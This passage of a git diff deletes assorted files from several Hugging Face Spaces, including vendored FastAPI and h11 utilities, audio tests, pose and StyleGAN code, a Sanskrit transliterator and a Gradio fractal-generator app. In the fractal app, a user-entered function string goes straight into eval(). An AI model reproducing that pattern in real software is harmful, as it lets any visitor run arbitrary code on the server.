BaseConfig, - ModelField, - PydanticSchemaGenerationError, - Undefined, - UndefinedType, - Validator, - lenient_issubclass, -) -from fastapi.datastructures import DefaultPlaceholder, DefaultType -from pydantic import BaseModel, create_model -from pydantic.fields import FieldInfo -from typing_extensions import Literal - -if TYPE_CHECKING: # pragma: nocover - from .routing import APIRoute - -# Cache for `create_cloned_field` -_CLONED_TYPES_CACHE: MutableMapping[ - Type[BaseModel], Type[BaseModel] -] = WeakKeyDictionary() - - -def is_body_allowed_for_status_code(status_code: Union[int, str, None]) -> bool: - if status_code is None: - return True - # Ref: https://github.com/OAI/OpenAPI-Specification/blob/main/versions/3.1.0.md#patterned-fields-1 - if status_code in { - "default", - "1XX", - "2XX", - "3XX", - "4XX", - "5XX", - }: - return True - current_status_code = int(status_code) - return not (current_status_code < 200 or current_status_code in {204, 304}) - - -def get_path_param_names(path: str) -> Set[str]: - return set(re.findall("{(.*?)}", path)) - - -def create_response_field( - name: str, - type_: Type[Any], - class_validators: Optional[Dict[str, Validator]] = None, - default: Optional[Any] = Undefined, - required: Union[bool, UndefinedType] = Undefined, - model_config: Type[BaseConfig] = BaseConfig, - field_info: Optional[FieldInfo] = None, - alias: Optional[str] = None, - mode: Literal["validation", "serialization"] = "validation", -) -> ModelField: - """ - Create a new response field. Raises if type_ is invalid. - """ - class_validators = class_validators or {} - if PYDANTIC_V2: - field_info = field_info or FieldInfo( - annotation=type_, default=default, alias=alias - ) - else: - field_info = field_info or FieldInfo() - kwargs = {"name": name, "field_info": field_info} - if PYDANTIC_V2: - kwargs.update({"mode": mode}) - else: - kwargs.update( - { - "type_": type_, - "class_validators": class_validators, - "default": default, - "required": required, - "model_config": model_config, - "alias": alias, - } - ) - try: - return ModelField(**kwargs) # type: ignore[arg-type] - except (RuntimeError, PydanticSchemaGenerationError): - raise fastapi.exceptions.FastAPIError( - "Invalid args for response field! Hint: " - f"check that {type_} is a valid Pydantic field type. " - "If you are using a return type annotation that is not a valid Pydantic " - "field (e.g. Union[Response, dict, None]) you can disable generating the " - "response model from the type annotation with the path operation decorator " - "parameter response_model=None. Read more: " - "https://fastapi.tiangolo.com/tutorial/response-model/" - ) from None - - -def create_cloned_field( - field: ModelField, - *, - cloned_types: Optional[MutableMapping[Type[BaseModel], Type[BaseModel]]] = None, -) -> ModelField: - if PYDANTIC_V2: - return field - # cloned_types caches already cloned types to support recursive models and improve - # performance by avoiding unecessary cloning - if cloned_types is None: - cloned_types = _CLONED_TYPES_CACHE - - original_type = field.type_ - if is_dataclass(original_type) and hasattr(original_type, "__pydantic_model__"): - original_type = original_type.__pydantic_model__ - use_type = original_type - if lenient_issubclass(original_type, BaseModel): - original_type = cast(Type[BaseModel], original_type) - use_type = cloned_types.get(original_type) - if use_type is None: - use_type = create_model(original_type.__name__, __base__=original_type) - cloned_types[original_type] = use_type - for f in original_type.__fields__.values(): - use_type.__fields__[f.name] = create_cloned_field( - f, cloned_types=cloned_types - ) - new_field = create_response_field(name=field.name, type_=use_type) - new_field.has_alias = field.has_alias # type: ignore[attr-defined] - new_field.alias = field.alias # type: ignore[misc] - new_field.class_validators = field.class_validators # type: ignore[attr-defined] - new_field.default = field.default # type: ignore[misc] - new_field.required = field.required # type: ignore[misc] - new_field.model_config = field.model_config # type: ignore[attr-defined] - new_field.field_info = field.field_info - new_field.allow_none = field.allow_none # type: ignore[attr-defined] - new_field.validate_always = field.validate_always # type: ignore[attr-defined] - if field.sub_fields: # type: ignore[attr-defined] - new_field.sub_fields = [ # type: ignore[attr-defined] - create_cloned_field(sub_field, cloned_types=cloned_types) - for sub_field in field.sub_fields # type: ignore[attr-defined] - ] - if field.key_field: # type: ignore[attr-defined] - new_field.key_field = create_cloned_field( # type: ignore[attr-defined] - field.key_field, cloned_types=cloned_types # type: ignore[attr-defined] - ) - new_field.validators = field.validators # type: ignore[attr-defined] - new_field.pre_validators = field.pre_validators # type: ignore[attr-defined] - new_field.post_validators = field.post_validators # type: ignore[attr-defined] - new_field.parse_json = field.parse_json # type: ignore[attr-defined] - new_field.shape = field.shape # type: ignore[attr-defined] - new_field.populate_validators() # type: ignore[attr-defined] - return new_field - - -def generate_operation_id_for_path( - *, name: str, path: str, method: str -) -> str: # pragma: nocover - warnings.warn( - "fastapi.utils.generate_operation_id_for_path() was deprecated, " - "it is not used internally, and will be removed soon", - DeprecationWarning, - stacklevel=2, - ) - operation_id = name + path - operation_id = re.sub(r"\W", "_", operation_id) - operation_id = operation_id + "_" + method.lower() - return operation_id - - -def generate_unique_id(route: "APIRoute") -> str: - operation_id = route.name + route.path_format - operation_id = re.sub(r"\W", "_", operation_id) - assert route.methods - operation_id = operation_id + "_" + list(route.methods)[0].lower() - return operation_id - - -def deep_dict_update(main_dict: Dict[Any, Any], update_dict: Dict[Any, Any]) -> None: - for key, value in update_dict.items(): - if ( - key in main_dict - and isinstance(main_dict[key], dict) - and isinstance(value, dict) - ): - deep_dict_update(main_dict[key], value) - elif ( - key in main_dict - and isinstance(main_dict[key], list) - and isinstance(update_dict[key], list) - ): - main_dict[key] = main_dict[key] + update_dict[key] - else: - main_dict[key] = value - - -def get_value_or_default( - first_item: Union[DefaultPlaceholder, DefaultType], - *extra_items: Union[DefaultPlaceholder, DefaultType], -) -> Union[DefaultPlaceholder, DefaultType]: - """ - Pass items or `DefaultPlaceholder`s by descending priority. - - The first one to _not_ be a `DefaultPlaceholder` will be returned. - - Otherwise, the first item (a `DefaultPlaceholder`) will be returned. - """ - items = (first_item,) + extra_items - for item in items: - if not isinstance(item, DefaultPlaceholder): - return item - return first_item - - -def match_pydantic_error_url(error_type: str) -> Any: - from dirty_equals import IsStr - - return IsStr(regex=rf"^https://errors\.pydantic\.dev/.*/v/{error_type}") diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/h11/_util.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/h11/_util.py deleted file mode 100644 index 6718445290770e028ea2f1f662026c9a0b0991db..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/h11/_util.py +++ /dev/null @@ -1,135 +0,0 @@ -from typing import Any, Dict, NoReturn, Pattern, Tuple, Type, TypeVar, Union - -__all__ = [ - "ProtocolError", - "LocalProtocolError", - "RemoteProtocolError", - "validate", - "bytesify", -] - - -class ProtocolError(Exception): - """Exception indicating a violation of the HTTP/1.1 protocol. - - This as an abstract base class, with two concrete base classes: - :exc:`LocalProtocolError`, which indicates that you tried to do something - that HTTP/1.1 says is illegal, and :exc:`RemoteProtocolError`, which - indicates that the remote peer tried to do something that HTTP/1.1 says is - illegal. See :ref:`error-handling` for details. - - In addition to the normal :exc:`Exception` features, it has one attribute: - - .. attribute:: error_status_hint - - This gives a suggestion as to what status code a server might use if - this error occurred as part of a request. - - For a :exc:`RemoteProtocolError`, this is useful as a suggestion for - how you might want to respond to a misbehaving peer, if you're - implementing a server. - - For a :exc:`LocalProtocolError`, this can be taken as a suggestion for - how your peer might have responded to *you* if h11 had allowed you to - continue. - - The default is 400 Bad Request, a generic catch-all for protocol - violations. - - """ - - def __init__(self, msg: str, error_status_hint: int = 400) -> None: - if type(self) is ProtocolError: - raise TypeError("tried to directly instantiate ProtocolError") - Exception.__init__(self, msg) - self.error_status_hint = error_status_hint - - -# Strategy: there are a number of public APIs where a LocalProtocolError can -# be raised (send(), all the different event constructors, ...), and only one -# public API where RemoteProtocolError can be raised -# (receive_data()). Therefore we always raise LocalProtocolError internally, -# and then receive_data will translate this into a RemoteProtocolError. -# -# Internally: -# LocalProtocolError is the generic "ProtocolError". -# Externally: -# LocalProtocolError is for local errors and RemoteProtocolError is for -# remote errors. -class LocalProtocolError(ProtocolError): - def _reraise_as_remote_protocol_error(self) -> NoReturn: - # After catching a LocalProtocolError, use this method to re-raise it - # as a RemoteProtocolError. This method must be called from inside an - # except: block. - # - # An easy way to get an equivalent RemoteProtocolError is just to - # modify 'self' in place. - self.__class__ = RemoteProtocolError # type: ignore - # But the re-raising is somewhat non-trivial -- you might think that - # now that we've modified the in-flight exception object, that just - # doing 'raise' to re-raise it would be enough. But it turns out that - # this doesn't work, because Python tracks the exception type - # (exc_info[0]) separately from the exception object (exc_info[1]), - # and we only modified the latter. So we really do need to re-raise - # the new type explicitly. - # On py3, the traceback is part of the exception object, so our - # in-place modification preserved it and we can just re-raise: - raise self - - -class RemoteProtocolError(ProtocolError): - pass - - -def validate( - regex: Pattern[bytes], data: bytes, msg: str = "malformed data", *format_args: Any -) -> Dict[str, bytes]: - match = regex.fullmatch(data) - if not match: - if format_args: - msg = msg.format(*format_args) - raise LocalProtocolError(msg) - return match.groupdict() - - -# Sentinel values -# -# - Inherit identity-based comparison and hashing from object -# - Have a nice repr -# - Have a *bonus property*: type(sentinel) is sentinel -# -# The bonus property is useful if you want to take the return value from -# next_event() and do some sort of dispatch based on type(event). - -_T_Sentinel = TypeVar("_T_Sentinel", bound="Sentinel") - - -class Sentinel(type): - def __new__( - cls: Type[_T_Sentinel], - name: str, - bases: Tuple[type, ...], - namespace: Dict[str, Any], - **kwds: Any - ) -> _T_Sentinel: - assert bases == (Sentinel,) - v = super().__new__(cls, name, bases, namespace, **kwds) - v.__class__ = v # type: ignore - return v - - def __repr__(self) -> str: - return self.__name__ - - -# Used for methods, request targets, HTTP versions, header names, and header -# values. Accepts ascii-strings, or bytes/bytearray/memoryview/..., and always -# returns bytes. -def bytesify(s: Union[bytes, bytearray, memoryview, int, str]) -> bytes: - # Fast-path: - if type(s) is bytes: - return s - if isinstance(s, str): - s = s.encode("ascii") - if isinstance(s, int): - raise TypeError("expected bytes-like object, not int") - return bytes(s) diff --git a/spaces/Datasculptor/MusicGen/tests/data/test_audio_utils.py b/spaces/Datasculptor/MusicGen/tests/data/test_audio_utils.py deleted file mode 100644 index 0480671bb17281d61ce02bce6373a5ccec89fece..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/MusicGen/tests/data/test_audio_utils.py +++ /dev/null @@ -1,110 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import julius -import torch -import pytest - -from audiocraft.data.audio_utils import ( - _clip_wav, - convert_audio_channels, - convert_audio, - normalize_audio -) -from ..common_utils import get_batch_white_noise - - -class TestConvertAudioChannels: - - def test_convert_audio_channels_downmix(self): - b, c, t = 2, 3, 100 - audio = get_batch_white_noise(b, c, t) - mixed = convert_audio_channels(audio, channels=2) - assert list(mixed.shape) == [b, 2, t] - - def test_convert_audio_channels_nochange(self): - b, c, t = 2, 3, 100 - audio = get_batch_white_noise(b, c, t) - mixed = convert_audio_channels(audio, channels=c) - assert list(mixed.shape) == list(audio.shape) - - def test_convert_audio_channels_upmix(self): - b, c, t = 2, 1, 100 - audio = get_batch_white_noise(b, c, t) - mixed = convert_audio_channels(audio, channels=3) - assert list(mixed.shape) == [b, 3, t] - - def test_convert_audio_channels_upmix_error(self): - b, c, t = 2, 2, 100 - audio = get_batch_white_noise(b, c, t) - with pytest.raises(ValueError): - convert_audio_channels(audio, channels=3) - - -class TestConvertAudio: - - def test_convert_audio_channels_downmix(self): - b, c, dur = 2, 3, 4. - sr = 128 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=sr, to_channels=2) - assert list(out.shape) == [audio.shape[0], 2, audio.shape[-1]] - - def test_convert_audio_channels_upmix(self): - b, c, dur = 2, 1, 4. - sr = 128 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=sr, to_channels=3) - assert list(out.shape) == [audio.shape[0], 3, audio.shape[-1]] - - def test_convert_audio_upsample(self): - b, c, dur = 2, 1, 4. - sr = 2 - new_sr = 3 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=new_sr, to_channels=c) - out_j = julius.resample.resample_frac(audio, old_sr=sr, new_sr=new_sr) - assert torch.allclose(out, out_j) - - def test_convert_audio_resample(self): - b, c, dur = 2, 1, 4. - sr = 3 - new_sr = 2 - audio = get_batch_white_noise(b, c, int(sr * dur)) - out = convert_audio(audio, from_rate=sr, to_rate=new_sr, to_channels=c) - out_j = julius.resample.resample_frac(audio, old_sr=sr, new_sr=new_sr) - assert torch.allclose(out, out_j) - - -class TestNormalizeAudio: - - def test_clip_wav(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - _clip_wav(audio) - assert audio.abs().max() <= 1 - - def test_normalize_audio_clip(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - norm_audio = normalize_audio(audio, strategy='clip') - assert norm_audio.abs().max() <= 1 - - def test_normalize_audio_rms(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - norm_audio = normalize_audio(audio, strategy='rms') - assert norm_audio.abs().max() <= 1 - - def test_normalize_audio_peak(self): - b, c, dur = 2, 1, 4. - sr = 3 - audio = 10.0 * get_batch_white_noise(b, c, int(sr * dur)) - norm_audio = normalize_audio(audio, strategy='peak') - assert norm_audio.abs().max() <= 1 diff --git a/spaces/Datasculptor/StyleGAN-NADA/op/fused_act_cpu.py b/spaces/Datasculptor/StyleGAN-NADA/op/fused_act_cpu.py deleted file mode 100644 index f997dafdd53aa9f4bbe07af6746c67a2c6dcb4c7..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/StyleGAN-NADA/op/fused_act_cpu.py +++ /dev/null @@ -1,41 +0,0 @@ -import os - -import torch -from torch import nn -from torch.autograd import Function -from torch.nn import functional as F - - -module_path = os.path.dirname(__file__) - - -class FusedLeakyReLU(nn.Module): - def __init__(self, channel, negative_slope=0.2, scale=2 ** 0.5): - super().__init__() - - self.bias = nn.Parameter(torch.zeros(channel)) - self.negative_slope = negative_slope - self.scale = scale - - def forward(self, input): - return fused_leaky_relu(input, self.bias, self.negative_slope, self.scale) - -def fused_leaky_relu(input, bias=None, negative_slope=0.2, scale=2 ** 0.5): - if input.device.type == "cpu": - if bias is not None: - rest_dim = [1] * (input.ndim - bias.ndim - 1) - return ( - F.leaky_relu( - input + bias.view(1, bias.shape[0], *rest_dim), negative_slope=0.2 - ) - * scale - ) - - else: - return F.leaky_relu(input, negative_slope=0.2) * scale - - else: - return FusedLeakyReLUFunction.apply( - input.contiguous(), bias, negative_slope, scale - ) - diff --git a/spaces/DeclK/pose/tools/utils.py b/spaces/DeclK/pose/tools/utils.py deleted file mode 100644 index 9a426b03f7283da3486f19de3fff0d3430c71b61..0000000000000000000000000000000000000000 --- a/spaces/DeclK/pose/tools/utils.py +++ /dev/null @@ -1,120 +0,0 @@ -from mmdet.datasets import CocoDataset -import time -from pathlib import Path -from ffmpy import FFmpeg -import shutil -import tempfile -from easydict import EasyDict -import numpy as np - -def coco_keypoint_id_table(reverse=False): - id2name = { 0: 'nose', - 1: 'left_eye', - 2: 'right_eye', - 3: 'left_ear', - 4: 'right_ear', - 5: 'left_shoulder', - 6: 'right_shoulder', - 7: 'left_elbow', - 8: 'right_elbow', - 9: 'left_wrist', - 10: 'right_wrist', - 11: 'left_hip', - 12: 'right_hip', - 13: 'left_knee', - 14: 'right_knee', - 15: 'left_ankle', - 16: 'right_ankle'} - if reverse: - return {v: k for k, v in id2name.items()} - return id2name - -def get_skeleton(): - """ My skeleton links, I deleted some links from default coco style. - """ - SKELETON = EasyDict() - SKELETON.head = [[0,1], [0,2], [1,3], [2,4]] - SKELETON.left_arm = [[5, 7], [7, 9]] - SKELETON.right_arm = [[6, 8], [8, 10]] - SKELETON.left_leg = [[11, 13], [13, 15]] - SKELETON.right_leg = [[12, 14], [14, 16]] - SKELETON.body = [[5, 6], [5, 11], [6, 12], [11, 12]] - return SKELETON - -def get_keypoint_weight(low_weight_ratio=0.1, mid_weight_ratio=0.5): - """ Get keypoint weight, used in object keypoint similarity, - `low_weight_names` are points I want to pay less attention. - """ - low_weight_names = ['nose', 'left_eye', 'right_eye', 'left_ear', 'right_ear'] - mid_weight_names = ['left_shoulder', 'right_shoulder', 'left_hip', 'right_hip'] - - logtis = np.ones(17) - name2id = coco_keypoint_id_table(reverse=True) - - low_weight_id = [name2id[n] for n in low_weight_names] - mid_weight_id = [name2id[n] for n in mid_weight_names] - logtis[low_weight_id] = low_weight_ratio - logtis[mid_weight_id] = mid_weight_ratio - - weights = logtis / np.sum(logtis) - return weights - -def coco_cat_id_table(): - classes = CocoDataset.METAINFO['classes'] - id2name = {i: name for i, name in enumerate(classes)} - - return id2name - -def filter_by_catgory(bboxes, scores, labels, names): - """ Filter labels by classes - Args: - - labels: list of labels, each label is a dict - - classes: list of class names - """ - id2name = coco_cat_id_table() - # names of labels - label_names = [id2name[id] for id in labels] - # filter by class names - mask = np.isin(label_names, names) - return bboxes[mask], scores[mask], labels[mask] - -def filter_by_score(bboxes, scores, labels, score_thr): - """ Filter bboxes by score threshold - Args: - - bboxes: list of bboxes, each bbox is a dict - - score_thr: score threshold - """ - mask = scores > score_thr - return bboxes[mask], scores[mask], labels[mask] - -def convert_video_to_playable_mp4(video_path: str) -> str: - """ Copied from gradio - Convert the video to mp4. If something goes wrong return the original video. - """ - try: - output_path = Path(video_path).with_suffix(".mp4") - with tempfile.NamedTemporaryFile(delete=False) as tmp_file: - shutil.copy2(video_path, tmp_file.name) - # ffmpeg will automatically use h264 codec (playable in browser) when converting to mp4 - ff = FFmpeg( - inputs={str(tmp_file.name): None}, - outputs={str(output_path): None}, - global_options="-y -loglevel quiet", - ) - ff.run() - except: - print(f"Error when converting video to browser-playable format. Returning original video.") - output_path = video_path - return str(output_path) - -class Timer: - def __init__(self): - self.start_time = time.time() - - def click(self): - used_time = time.time() - self.start_time - self.start_time = time.time() - return used_time - - def start(self): - self.start_time = time.time() \ No newline at end of file diff --git a/spaces/DemoLou/moe-tts/text/sanskrit.py b/spaces/DemoLou/moe-tts/text/sanskrit.py deleted file mode 100644 index 0223aaac384a2f850f5bc20651fc18eb964607d0..0000000000000000000000000000000000000000 --- a/spaces/DemoLou/moe-tts/text/sanskrit.py +++ /dev/null @@ -1,62 +0,0 @@ -import re -from indic_transliteration import sanscript - - -# List of (iast, ipa) pairs: -_iast_to_ipa = [(re.compile('%s' % x[0]), x[1]) for x in [ - ('a', 'ə'), - ('ā', 'aː'), - ('ī', 'iː'), - ('ū', 'uː'), - ('ṛ', 'ɹ`'), - ('ṝ', 'ɹ`ː'), - ('ḷ', 'l`'), - ('ḹ', 'l`ː'), - ('e', 'eː'), - ('o', 'oː'), - ('k', 'k⁼'), - ('k⁼h', 'kʰ'), - ('g', 'g⁼'), - ('g⁼h', 'gʰ'), - ('ṅ', 'ŋ'), - ('c', 'ʧ⁼'), - ('ʧ⁼h', 'ʧʰ'), - ('j', 'ʥ⁼'), - ('ʥ⁼h', 'ʥʰ'), - ('ñ', 'n^'), - ('ṭ', 't`⁼'), - ('t`⁼h', 't`ʰ'), - ('ḍ', 'd`⁼'), - ('d`⁼h', 'd`ʰ'), - ('ṇ', 'n`'), - ('t', 't⁼'), - ('t⁼h', 'tʰ'), - ('d', 'd⁼'), - ('d⁼h', 'dʰ'), - ('p', 'p⁼'), - ('p⁼h', 'pʰ'), - ('b', 'b⁼'), - ('b⁼h', 'bʰ'), - ('y', 'j'), - ('ś', 'ʃ'), - ('ṣ', 's`'), - ('r', 'ɾ'), - ('l̤', 'l`'), - ('h', 'ɦ'), - ("'", ''), - ('~', '^'), - ('ṃ', '^') -]] - - -def devanagari_to_ipa(text): - text = text.replace('ॐ', 'ओम्') - text = re.sub(r'\s*।\s*$', '.', text) - text = re.sub(r'\s*।\s*', ', ', text) - text = re.sub(r'\s*॥', '.', text) - text = sanscript.transliterate(text, sanscript.DEVANAGARI, sanscript.IAST) - for regex, replacement in _iast_to_ipa: - text = re.sub(regex, replacement, text) - text = re.sub('(.)[`ː]*ḥ', lambda x: x.group(0) - [:-1]+'h'+x.group(1)+'*', text) - return text diff --git a/spaces/Demosthene-OR/avr23-cds-translation/member.py b/spaces/Demosthene-OR/avr23-cds-translation/member.py deleted file mode 100644 index e57edbfa4fc87c4a34a489e2c3fdbd8702a22696..0000000000000000000000000000000000000000 --- a/spaces/Demosthene-OR/avr23-cds-translation/member.py +++ /dev/null @@ -1,19 +0,0 @@ -class Member: - def __init__( - self, name: str, linkedin_url: str = None, github_url: str = None - ) -> None: - self.name = name - self.linkedin_url = linkedin_url - self.github_url = github_url - - def sidebar_markdown(self): - - markdown = f'{self.name}' - - if self.linkedin_url is not None: - markdown += f' linkedin ' - - if self.github_url is not None: - markdown += f' github ' - - return markdown diff --git a/spaces/DrGabrielLopez/fractal-generator/app.py b/spaces/DrGabrielLopez/fractal-generator/app.py deleted file mode 100644 index 7b7c12e4f4ea8bcc42f5406ccf1fea8eec0eb56f..0000000000000000000000000000000000000000 --- a/spaces/DrGabrielLopez/fractal-generator/app.py +++ /dev/null @@ -1,60 +0,0 @@ -import gradio as gr -from numpy import * - -from fractal_generator import FractalGenerator - -TITLE = "Fractal Generator" -DESCRIPTION = "
    Create your own fractal art!
    " -EXAMPLES = [ - ["Julia", "sin(z**12 + cos(0.7*z**12) + 1.41)"], - ["Julia", "sin(z**6 + cos(0.7*z**6) + tan(z**3) + 1.41)"], - ["Julia", "sin(z**7 + cos(z**5) + tanh(z**3) + 0.61)"], - ["Julia", "sin(arcsin(z**7) + arccos(z**5) + arctan(z**3) + 0.61)"], - ["Julia", "sin(arccos(z**3 - z**2 + z)+ 0.61)"], - ["Julia", "log(arccos(z**3 - z**2 + z)+ 0.61)"], - ["Julia", "sin(z**4 + 3.41)*exp(2.5*1J)"], - ["Julia", "cos(cosh(z**3) - sinh(z**2) + tanh(z**4))**2"], -] -ARTICLE = r"""
    - This application uses Julia and Mandelbrot fractal algorithms. - These plots show the convergence plot for infinitely composed complex functions
    - These functions are based on artist-defined generating functions $f(z)$ with $z /in /mathbb{C}$ as follows
    - $$ F(z) = /prod^{/inf} f(z) $$
    - Done by dr. Gabriel Lopez
    - For more please visit: My Page
    -
    """ - -# interactive function -def plot_fractal(fractal_type: str, python_function: str): - frac = FractalGenerator(n=500, max_iter=10) - if fractal_type == "Julia": - frac.create_julia(lambda z: eval(python_function)) - elif fractal_type == "Mandelbrot": - frac.create_mandelbrot() - else: - print("Current wrong option: ", fractal_type) - return frac.plot() - - -# gradio frontend elements -in_dropdown = gr.Dropdown( - choices=["Julia", "Mandelbrot"], label="Select a type of fractal:", value="Julia" -) -in_text = gr.Textbox( - value="sin(z**4 + 1.41)", - label="Enter function using $z$ as complex-variable. You can use all numpy functions. 1J = /sqrt{-1}", - placeholder="your own z function", - lines=4, -) -out_plot = gr.Plot(label="Fractal plot") - -# gradio interface -gr.Interface( - inputs=[in_dropdown, in_text], - outputs=out_plot, - fn=plot_fractal, - examples=EXAMPLES, - title=TITLE, - description=DESCRIPTION, - article=ARTICLE, -).launch() diff --git a/spaces/DragGan/DragGan/stylegan_human/training_scripts/sg3/training/networks_stylegan3.py b/spaces/DragGan/DragGan/stylegan_human/training_scripts/sg3/training/networks_stylegan3.py deleted file mode 100644 index 3c2391bea7511ee1e8c658ec90e5b67b4380a45e..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan/stylegan_human/training_scripts/sg3/training/networks_stylegan3.py +++ /dev/null @@ -1,539 +0,0 @@ -# Copyright (c) SenseTime Research. All rights reserved. - -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Generator architecture from the paper -"Alias-Free Generative Adversarial Networks".""" - -import numpy as np -import scipy.signal -import scipy.optimize -import torch -from torch_utils import misc -from torch_utils import persistence -from torch_utils.ops import conv2d_gradfix -from torch_utils.ops import filtered_lrelu -from torch_utils.ops import bias_act - -#---------------------------------------------------------------------------- - -@misc.profiled_function -def modulated_conv2d( - x, # Input tensor: [batch_size, in_channels, in_height, in_width] - w, # Weight tensor: [out_channels, in_channels, kernel_height, kernel_width] - s, # Style tensor: [batch_size, in_channels] - demodulate = True, # Apply weight demodulation? - padding = 0, # Padding: int or [padH, padW] - input_gain = None, # Optional scale factors for the input channels: [], [in_channels], or [batch_size, in_channels] -): - with misc.suppress_tracer_warnings(): # this value will be treated as a constant - batch_size = int(x.shape[0]) - out_channels, in_channels, kh, kw = w.shape - misc.assert_shape(w, [out_channels, in_channels, kh, kw]) # [OIkk] - misc.assert_shape(x, [batch_size, in_channels, None, None]) # [NIHW] - misc.assert_shape(s, [batch_size, in_channels]) # [NI] - - # Pre-normalize inputs. - if demodulate: - w = w * w.square().mean([1,2,3], keepdim=True).rsqrt() - s = s * s.square().mean().rsqrt() - - # Modulate weights. - w = w.unsqueeze(0) # [NOIkk] - w = w * s.unsqueeze(1).unsqueeze(3).unsqueeze(4) # [NOIkk] - - # Demodulate weights. - if demodulate: - dcoefs = (w.square().sum(dim=[2,3,4]) + 1e-8).rsqrt() # [NO] - w = w * dcoefs.unsqueeze(2).unsqueeze(3).unsqueeze(4) # [NOIkk] - - # Apply input scaling. - if input_gain is not None: - input_gain = input_gain.expand(batch_size, in_channels) # [NI] - w = w * input_gain.unsqueeze(1).unsqueeze(3).unsqueeze(4) # [NOIkk] - - # Execute as one fused op using grouped convolution. - x = x.reshape(1, -1, *x.shape[2:]) - w = w.reshape(-1, in_channels, kh, kw) - x = conv2d_gradfix.conv2d(input=x, weight=w.to(x.dtype), padding=padding, groups=batch_size) - x = x.reshape(batch_size, -1, *x.shape[2:]) - return x - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class FullyConnectedLayer(torch.nn.Module): - def __init__(self, - in_features, # Number of input features. - out_features, # Number of output features. - activation = 'linear', # Activation function: 'relu', 'lrelu', etc. - bias = True, # Apply additive bias before the activation function? - lr_multiplier = 1, # Learning rate multiplier. - weight_init = 1, # Initial standard deviation of the weight tensor. - bias_init = 0, # Initial value of the additive bias. - ): - super().__init__() - self.in_features = in_features - self.out_features = out_features - self.activation = activation - self.weight = torch.nn.Parameter(torch.randn([out_features, in_features]) * (weight_init / lr_multiplier)) - bias_init = np.broadcast_to(np.asarray(bias_init, dtype=np.float32), [out_features]) - self.bias = torch.nn.Parameter(torch.from_numpy(bias_init / lr_multiplier)) if bias else None - self.weight_gain = lr_multiplier / np.sqrt(in_features) - self.bias_gain = lr_multiplier - - def forward(self, x): - w = self.weight.to(x.dtype) * self.weight_gain - b = self.bias - if b is not None: - b = b.to(x.dtype) - if self.bias_gain != 1: - b = b * self.bias_gain - if self.activation == 'linear' and b is not None: - x = torch.addmm(b.unsqueeze(0), x, w.t()) - else: - x = x.matmul(w.t()) - x = bias_act.bias_act(x, b, act=self.activation) - return x - - def extra_repr(self): - return f'in_features={self.in_features:d}, out_features={self.out_features:d}, activation={self.activation:s}' - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class MappingNetwork(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - c_dim, # Conditioning label (C) dimensionality, 0 = no labels. - w_dim, # Intermediate latent (W) dimensionality. - num_ws, # Number of intermediate latents to output. - num_layers = 2, # Number of mapping layers. - lr_multiplier = 0.01, # Learning rate multiplier for the mapping layers. - w_avg_beta = 0.998, # Decay for tracking the moving average of W during training. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.num_ws = num_ws - self.num_layers = num_layers - self.w_avg_beta = w_avg_beta - - # Construct layers. - self.embed = FullyConnectedLayer(self.c_dim, self.w_dim) if self.c_dim > 0 else None - features = [self.z_dim + (self.w_dim if self.c_dim > 0 else 0)] + [self.w_dim] * self.num_layers - for idx, in_features, out_features in zip(range(num_layers), features[:-1], features[1:]): - layer = FullyConnectedLayer(in_features, out_features, activation='lrelu', lr_multiplier=lr_multiplier) - setattr(self, f'fc{idx}', layer) - self.register_buffer('w_avg', torch.zeros([w_dim])) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False): - misc.assert_shape(z, [None, self.z_dim]) - if truncation_cutoff is None: - truncation_cutoff = self.num_ws - - # Embed, normalize, and concatenate inputs. - x = z.to(torch.float32) - x = x * (x.square().mean(1, keepdim=True) + 1e-8).rsqrt() - if self.c_dim > 0: - misc.assert_shape(c, [None, self.c_dim]) - y = self.embed(c.to(torch.float32)) - y = y * (y.square().mean(1, keepdim=True) + 1e-8).rsqrt() - x = torch.cat([x, y], dim=1) if x is not None else y - - # Execute layers. - for idx in range(self.num_layers): - x = getattr(self, f'fc{idx}')(x) - - # Update moving average of W. - if update_emas: - self.w_avg.copy_(x.detach().mean(dim=0).lerp(self.w_avg, self.w_avg_beta)) - - # Broadcast and apply truncation. - x = x.unsqueeze(1).repeat([1, self.num_ws, 1]) - if truncation_psi != 1: - x[:, :truncation_cutoff] = self.w_avg.lerp(x[:, :truncation_cutoff], truncation_psi) - return x - - def extra_repr(self): - return f'z_dim={self.z_dim:d}, c_dim={self.c_dim:d}, w_dim={self.w_dim:d}, num_ws={self.num_ws:d}' - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class SynthesisInput(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - channels, # Number of output channels. - size, # Output spatial size: int or [width, height]. - sampling_rate, # Output sampling rate. - bandwidth, # Output bandwidth. - square, - ): - super().__init__() - self.w_dim = w_dim - self.channels = channels - self.square = square - if self.square: - 